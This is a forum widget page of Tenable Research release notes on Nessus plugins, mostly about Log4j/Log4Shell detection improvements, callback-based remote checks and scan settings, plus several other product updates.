Forum Widgets
Recent Discussions
Apache Log4j Detection Optimizations Summary: While the...
Apache Log4j Detection Optimizations Summary: While the operating system ultimately controls scheduling and resource allocation, we have made additional optimizations to the Apache Log4j JAR Detection (Windows) (156001) plugin to reduce the resource usage while scanning entire file systems along with inspecting each Java archive file on the target Windows host during the scan. Impact: Customers should observe fewer resources being consumed on Windows scan targets during a local or Agent scan but may also observe longer scan times. Note that the plugin timeout can be adjusted under Advanced Settings (e.g. timeout.156001) to a different timeout other than the default of one hour to assist in performance. Also, please make sure that any security controls on the host are not interfering with the detection and possibly causing additional resource usage. Plugin: Apache Log4j JAR Detection (Windows) (156001) Target Release Date: January 19, 2022 (released in Nessus plugin feed 202201200227) The plugin has been updated to no longer use the 'dir' and 'findstr' anymore since this can potentially use more resources and using Powershell for the file system scan, while potentially slower, uses less resources. Also, the plugin has been updated to slow down the Java archive inspection in Powershell before explicitly closing the handle. This should assist with the garbage collection and result in considerably less resource usage.
Tenable Research is providing the following supporting...
Tenable Research is providing the following supporting information about the 31 NASL detection plugins and two WAS plugin recently released in response to a critical vulnerability reported in Log4j (Log4Shell). As a reminder, it is recommended that thorough_tests are enabled for all scans using these CVE-2021-44228, CVE-2021-45046, CVE-2021-4104, and CVE-2021-45105 plugins. NASL plugins 156183 Apache Log4j 2.x < 2.17.0 DoS Version check for known vuln Log4j versions related to CVE-2021-45105 in Windows, Unix and Linux systems 156057 Apache Log4j 2.x < 2.16.0 Version check for known vuln Log4j versions related to CVE-2021-45046 in Windows, Unix and Linux systems 156165 Apache Log4j 2.x < 2.16.0 RCE Version check for known vuln Log4j versions related to CVE-2021-45046 in MacOS systems 156164 Apache Log4Shell CVE-2021-45046 Bypass Remote Code Execution - (Direct Check HTTP) Direct Check compatible with Tenable.io Cloud Scanners and restrictive networks Delivers jndi:ldap crafted payloads including Session, JSession and PHPSession into the HTTP headers and then tracks the injection via DNS when the callback is made. Callback is needed given the nature of the vulnerability wherein the target / victim connects back to the host sending the original request and the host is vulnerable if the callback happens This plugin uses DNS (default port 53) for network communication. The following Apache Log4Shell CVE-2021-44228 Direct Checks share common techniques applied on different ports and protocols. They all share the following attributes: Direct Checks compatible with Tenable.io Cloud Scanners and restrictive networks Callback is needed given the nature of the vulnerability wherein the target / victim connects back to the host sending the original request and the host is vulnerable if the callback happens These plugins DNS (default port 53) for network communication. Delivers jndi:ldap crafted header script to select ports on a scan target and then tracks the injection via DNS when the callback is made CVE-2021-44228 direct check not requiring authentication 156669 Apache Log4Shell RCE detection via callback correlation (Direct Check - MSRPC) 156559 Apache Log4Shell RCE detection via callback correlation (Direct Check - RPCBIND) 156445 Apache Log4Shell RCE detection via callback correlation (Direct Check - PPTP) 156375 Apache Log4Shell RCE detection via callback correlation (Direct Check - UPnP) 156258 Apache Log4Shell RCE detection via callback correlation (Direct Check - NTP) 156257 Apache Log4Shell RCE detection via callback correlation (Direct Check - DNS) 156256 Apache Log4Shell RCE detection via callback correlation (Direct Check - SNMP) 156232 Apache Log4Shell RCE detection via callback correlation (Direct Check - SMB) 156197 Apache Log4Shell RCE detection via callback correlation (Direct Check - NetBIOS) 156166 Apache Log4Shell RCE detection via callback correlation (Direct Check - SSH) 156162 Apache Log4Shell RCE detection via callback correlation (Direct Check - Telnet) 156158 Apache Log4Shell RCE detection via callback correlation (Direct Check - IMAP) 156157 Apache Log4Shell RCE detection via callback correlation (Direct Check - POP3) 156132 Apache Log4Shell RCE detection via callback correlation (Direct Check - SMTP) 156115 Apache Log4Shell RCE detection via callback correlation (Direct Check - FTP) 156056 Apache Log4Shell RCE detection via callback correlation (Direct Check - any open port) 156035 VMware vCenter Log4Shell (Direct Check HTTP) Delivers jndi:ldap crafted payloads into the HTTP header of VMWare vCenter applications installed on the remote host on a scan target and then tracks the injection via DNS when the callback is made 156017 Apache Log4Shell RCE detection via callback correlation (Direct Check - SIP) 156016 Apache Log4Shell RCE detection via Path Enumeration (Direct Check HTTP) 156014 Apache Log4Shell RCE detection via callback correlation (Direct Check HTTP) CVE-2021-44228 direct check not requiring authentication Direct Check compatible with Tenable.io Cloud Scanners and restrictive networks Injects payload into the HTTP headers and then tracks the injection via DNS when the callback is made Callback is needed given the nature of the vulnerability wherein the target / victim connects back to the host sending the original request and the host is vulnerable if the callback happens This plugin uses DNS (default port 53) for network communication. 155998 Apache Log4j Message Lookup Substitution RCE (Log4Shell) (Direct Check) CVE-2021-44228 direct check not requiring authentication Scanner sends jndi:ldap string to target and listens for LDAP BIND request from target It is not compatible with Tenable.io cloud scanners and may fail to return results in certain networks due to firewall rules or interference from other security devices. Callback is needed given the nature of the vulnerability wherein the target / victim connects back to the host sending the original request and the host is vulnerable if the callback happens This plugin uses ephemeral ports 50,000-60,000 for network communication 156001 Apache Log4j JAR Detection (Windows) Local Windows detection **recommend Thorough Tests** Checks running processes for Java instances running with Log4j in classpath and records the file paths Searches the file system for .jar files with known vuln Log4j filename matches (if thorough tests is enabled) 156000 Apache Log4j Installed (Unix) Local Linux detection Checks rpm packages for vulnerable Log4j matches (RedHat, Gentoo, SuSE, etc.) Search the file system paths for known vulnerable Log4j matches (if thorough tests is enabled) 155999 Apache Log4j < 2.15.0 Remote Code Execution Local Linux Detection (uses 156000) Version check for known vuln Log4j versions in Unix and Linux systems 156002 Apache Log4j < 2.15.0 Remote Code Execution Local Windows detection (uses 156001) Version check for known vuln Log4j versions in Windows systems 156032 EOL plugin for Log4j 1.x Apache Log4j version < 1.x End of Life / Unsupported Version Detection 156103 Apache Log4j 1.2 JMSAppender Remote Code Execution (CVE-2021-4104) The version of Apache Log4j on the remote host is 1.2. It is, therefore, affected by a remote code execution vulnerability when specifically configured to use JMSAppender. WAS plugins 113075- Apache Log4j Remote Code Execution (Log4Shell) CVE-2021-44228 direct check not requiring authentication Inject payload into the HTTP headers, POST/GET values, XML, JSON, cookies, etc. and then track the injection via DNS when the callback is made Callback is needed given the nature of the vulnerability wherein the target / victim connects back to the host sending the original request and the host is vulnerable if the callback happens 113076- Apache Log4j Remote Code Execution (Log4Shell) CVE-2021-44228 WAS Log4Shell file detection plugin Scan the web application directories for known vulnerable version of the Log4j installation file and flag the host if foundApache Log4j Detection Improvements Summary: Since CVE-2021-4
Apache Log4j Detection Improvements Summary: Since CVE-2021-44228 was first announced, Tenable has been working diligently on improving the local detections for Apache Log4j on Windows, Linux, and Unix operating systems based on additional research, testing, telemetry, and customer feedback. These improvements have been released once they were well tested and reviewed due to the urgency and need for Log4j detections. After customer feedback and careful consideration, we have removed the requirement for thorough tests which will lead to less false negatives but will require more resources than scans previously done without thorough tests enabled. The improvements that have been released or will be released shortly include: Apache Log4j Installed (Linux / Unix) (156000) Utilize the ‘locate’ command (if available) over the ‘find’ command Use the same parameters for the ‘find’ command regardless of the thorough tests setting Search for and inspect all Java archive files (JAR, WAR, EAR) that can contain Log4j Does not recursively extract nested Java archive files due to potential performance and resource issues Check the log4j-core JAR file for JndiLookup.class Check running processes if the Log4j JAR was supplied in the command line arguments Expanded package manager checks to additional OSes Fixed a regression that was causing certain 1.x versions to be excluded Increased data collection Optimizations and Agent enablement for scans against macOS hosts Increased timeouts Apache Log4j JAR Detection (Windows) (156001) The file system search was originally performed by an upstream plugin (152357) but has been implemented into 156001 to alway for an optimized file system search for Java archive files (JAR, WAR, EAR) resulting in a considerable performance gain Note that the thorough tests requirement was removed to run the file system search Search for and inspect all Java archive files that can contain the Log4j JAR file Does not recursively extract nested Java archive files due to potential performance and resource issues Check the log4j-core JAR file for JndiLookup.class Tenable is working on and will continue to explore additional enhancements. Impact: Customers should expect to see improved local detection of Apache Log4j potentially resulting in an increase in new vulnerability detections and longer scan times. Note that any scans with plugins 156000, 156001, or that depend on these detection plugins enabled may take longer due to the expanded detection methods. Plugins: Apache Log4j Installed (Linux / Unix) (156000) Apache Log4j JAR Detection (Windows) (156001) Target Release Date: December 22, 2021: Improvements for Apache Log4j JAR Detection (Windows) (156001) - Released in Nessus plugin feed 202112230037 Released December 27, 2021 in Nessus plugin feed 202112280531: Inclusion of WAR and EAR files in Apache Log4j Installed (Linux / Unix) - 156000 JndiLookup.class check in Apache Log4j JAR Detection (Windows) - 156001 The other improvements for Apache Log4j Installed (Linux / Unix) (156000) have been recently or previously released.Tenable Research Release Highlight Nessus Agent Reset...
Tenable Research Release Highlight Nessus Agent Reset Plugin and Scan Template Summary Tenable Research has released a Credentialed Scan plugin and Scan Template “Nessus 10.8.0 / 10.8.1 Agent Reset” in support of addressing the issues in the Nessus Agent 10.8.0 and 10.8.1. Change New Scan Template: “Nessus 10.8.0 / 10.8.1 Agent Reset” Pre-requisite: Ensure that the agent version is set to 10.8.2 or 10.7.x in Agent Profile (for TVM) and Nessus Manager (for TSC). This Scan Template and Credentialed Scan plugin will run OS specific scripts to remotely reset the agent plugins on Windows, Mac OS or ‘Nix based Nessus Agent host machines on 10.8.0 or 10.8.1. These scripts and the permissions level each script requires are detailed in the Nessus Agent 10.8.2 Release Notes (https://docs.tenable.com/release-notes/Content/nessus-agent/2025.htm#10.8.2) under the [Perform a plugin reset] section. Notes: The Nessus Agent Reset plugin will only run from the provided Scan Template and will not reset Nessus Agents when run from any other Scan Template. For Ubuntu/Debian Unix credentials, please ensure that only one set of privilege escalation credentials are provided with the required permissions level for the OS script to execute. 13 JAN 2025 UPDATE: Please note that triggering a plugin reset will result in a large spike in network traffic. Impact Without this script, customers would have to logon to each Nessus Agent host and run the appropriate Nessus Agent Reset script for that host OS. Using this Scan Template and Credentialed Scan plugin, customers can run the Nessus Agent Reset scripts on each updated Nessus Agent from a Remote Credentialed Scan, with the necessary credentials and permissions, using Nessus, Nessus Manager, T.VM, and T.SC (released 08 JAN). Target Release Date 07 JAN 2025Apache Log4j Detection for Windows - Manifest / Properties...
Apache Log4j Detection for Windows - Manifest / Properties Detection Update Summary: In the light of resource requirements to scan entire file systems along with inspecting each Java archive file in-depth while checking the manifest and properties files, we have decided to require that the following settings be enabled to leverage the detection using manifest and properties files in Apache Log4j JAR Detection (Windows) (156001): ‘Perform thorough tests’ setting must be enabled ‘Override normal accuracy’ setting must be set to ‘Show potential false alarms’ This feature was first released in Nessus plugin feed 202201080412. We are looking at ways to further optimize this feature to enable faster scans while lowering its impact on system resources. Impact: Customers may observe fewer resources being consumed on Windows scan targets during a local or Agent scan but may also observe slightly fewer Apache Log4j detections that were detected via the manifest or properties file over the past several days. Once ‘Perform thorough tests’ and ‘Override normal accuracy’ settings are configured as mentioned above, the detections should re-appear. A consequence of this change is that some Apache Log4j vulnerabilities may appear as remediated if they were previously detected via this method and subsequent scans did not have the aforementioned settings enabled. Plugin: Apache Log4j JAR Detection (Windows) (156001) References: Assessment Scan Settings - Perform thorough tests and Override normal Accuracy settings Target Release Date: January 12, 2022 (released in Nessus plugin feed 202201130817)Overview of Callbacks in Log4j Remote Detection Plugins The...
Overview of Callbacks in Log4j Remote Detection Plugins The following is an overview of callbacks in Tenable plugins for Log4Shell that perform remote detection 155998, 156014, 156016, 156017, 156035, 156056, 156115, 156132, 156157, 156158, 156162, 156166, 156197, 156232, 156256, 156257, 156258, 156375, 156445, 156559, and 156669. A HTTP request is sent by the scanner to the target being scanned with a benign payload containing a unique token. The target, if vulnerable, will act on the payload. Tenable tracks the target’s action on the payload via a callback to our hosted environment (plugins 156014, 156016, 156017, 156035, 156056, 156115, 156132, 156157, 156158, 156162, 156166,156197, 156232, 156256, 156257, 156258, 156375, 156445, 156559, and 156669) based on the unique token that was embedded in the initial request or via the LDAP connection callback to the scanner for plugin 155998. The callback is needed given the nature of the vulnerability as execution of the payload happens on the target being scanned. In plugin 155998, the callback happens to the scanner. This is the reason the plugin is not supported on Tenable.io cloud scanners In plugins 156014, 156016, 156017, 156035, 156056, 156115, 156132, 156157, 156158, 156162, 156166, 156197, 156232, 156256, 156257, 156258, 156375, 156445, 156559, and 156669 as part of execution of the payload, the target tries to resolve a domain owned by Tenable. While resolving the domain, Tenable is able to see the unique token that was sent in the initial request and thereby can track the callback. These plugins come with the major benefit that credentials are not required for scanning. However, the callbacks need to be successful for the plugin to be able to identify the exposure. Hence, communication between the target being scanned and the callback server must not be interrupted by intermediary devices. For more details: https://community.tenable.com/s/feed/0D53a00008E3hKzCAJ https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability
Active Directory Starter Scan Background As part of our...
Active Directory Starter Scan Background As part of our endeavor to help reduce our customers’ cyber exposure, we are releasing a Starter Scan template along with plugins that will peel the onion around Active Directory Security. We hope customers will leverage these plugins as a starting point and consider an Active Directory Vulnerability Management solution for more holistic determination, given Active Directory breaches are ever-increasing and extremely devastating. Change Ten plugins checking for common Active Directory misconfigurations / vulnerabilities are being released. Active Directory controller credentials will be required for these plugins to run. Active Directory specific scan templates are also being released for Nessus Professional, Tenable.sc and Tenable.io. Dashboards for Tenable.sc and Tenable.io will also be available. Impact Customers will be able to run scans highlighting Active Directory issues. Note that these are starter Active Directory checks. For more complete coverage, we strongly recommend considering an Active Directory VM solution. Note that these plugins are not available on Nessus Agents. Plugins 150480 AD Starter Scan - Kerberoasting 150481 AD Starter Scan - Weak Kerberos encryption 150482 AD Starter Scan - Kerberos Pre-authentication Validation 150483 AD Starter Scan - Non-Expiring Account Password 150484 AD Starter Scan - Kerberos Krbtgt 150485 AD Starter Scan - Unconstrained delegation 150486 AD Starter Scan - Dangerous Trust Relationship 150487 AD Starter Scan - Primary Group ID integrity 150488 AD Starter Scan - Null sessions 150489 AD Starter Scan - Blank passwords Release Date Thursday 29 of July 2021
Security End-of-Life Plugins Target Release Date Immediate...
Security End-of-Life Plugins Target Release Date Immediate Change Tenable Research is releasing a new dynamic and well-defined framework for detecting Security End-of-Life (SEoL) vulnerabilities. It abstracts various terminologies, such as End of Life, Unsupported, End of Support, etc., and provides a clear definition that serves as the basis for SEoL detection plugins. The new framework defines SEoL as the state in Security Maintenance Lifecycle when a product no longer receives security updates. Impact Tenable Research is implementing a new policy that informs the SEoL plugin framework design. To better inform the impact of SEoL products in our customer environments, Tenable is adopting a strategy that allows plugin severity to be more flexible and encourages scaling up instead of down. For this reason, net-new SEoL plugins will default to the INFO severity value. The new SEoL plugins can be identified by the Plugin Name attribute - it will contain “SEoL”, such as “Apache httpd SEoL (2.1.x <= x <= 2.2.x)”. Alternatively, they can be identified through the “unsupported_by_vendor: true” plugin attribute. Additional Notes Please note that any existing plugins for the SEoL use case containing “Unsupported” in the plugin name will be converted according to the new “SEoL” plugin specification or enter the deprecation process. Plugin severity will retain its originating value during these conversions. A public Knowledge Article was published to help answer any questions regarding the new plugins. For a more detailed description of the problem and Tenable’s solution, please refer to the blog - What Security Leaders Need to Know About Security End of Life: How Tenable is Leading the Way.Apache Log4j Detection Additional Improvements Summary:...
Apache Log4j Detection Additional Improvements Summary: Additional improvements have been made to the Windows and Linux / Unix detection plugins for Apache Log4j. The improvements have been recently released or will be released by the target release date include: Apache Log4j Installed (Linux / Unix) (156000) When the filename matches Log4j, the manifest and properties files will now be checked and the version in one of these files will supersede the version from the filename. For example, ‘log4j-core-2.15.0.jar’ is found but the manifest file has a version of ‘2.16.0’, then ‘2.16.0’ will be reported as the version. The Spotlight search via the ‘mdfind’ command will be used on macOS hosts that have indexing enabled and the ‘Perform thorough tests’ setting is not enabled. Improved handling of partial results when the plugin would normally time out. Note: the plugin timeout can be adjusted under Advanced Settings (i.e. timeout.156000) Apache Log4j JAR Detection (Windows) (156001) When the filename matches Log4j and the following scan preferences are configured, the manifest and properties files will be checked and the version in one of these files will supersede the version from the filename: ‘Perform thorough tests’ setting is enabled ‘Override normal accuracy’ setting is set to ‘Show potential false alarms’ Additional debugging has been added to assist in diagnosing potential issues. Improved handling of partial results when the plugin would normally time out. Note: the plugin timeout can be adjusted under Advanced Settings (i.e. timeout.156001) Please open a technical support ticket if you have an issue so that we can collect the required information to diagnose and assist you with your issue. Impact: Customers should expect to see improved local detection of Apache Log4j potentially resulting in an increase in new vulnerability detections and potentially longer scan times. Plugins: Apache Log4j Installed (Linux / Unix) (156000) Apache Log4j JAR Detection (Windows) (156001) Target Release Date: March 17, 2022 Update: Changes to 156000 went out in Nessus plugin feed 202203172204 Changes to 156001 have been delayed (ETA: March 25) These changes went out in Nessus plugin feed 202203251548
Tenable vCenter Integration: Report Active and Inactive...
Tenable vCenter Integration: Report Active and Inactive Virtual Machines Summary Tenable has introduced a new option to the VMware vCenter API credential called “Report Active and Inactive Virtual Machines”, which is an optional toggle. Change Prior to this change, the integration would always collect information about active and inactive virtual machines, regardless of auto-discovery settings. These virtual machines would be listed in the output of the “VMware vCenter Active Virtual Machines” (84340) and “VMware vCenter Inactive Virtual Machines” (84341) plugins. The new UI field allows for this collection to be disabled. The default value of this option is “on”, which is consistent with the integration’s behavior prior to this change. Impact For credentials found in Tenable Vulnerability Management scan configuration, the value may be “off” for existing scans. For other configurations, the value should be “on” by default so that scan behavior is completely unchanged. Though this change does not affect vulnerability findings but instead only informational-level output, we nevertheless encourage customers to check their scan configuration and ensure that the setting is set according to their preference. Release Date Nov 13, 2024 for TVM and Nessus TBD for SC
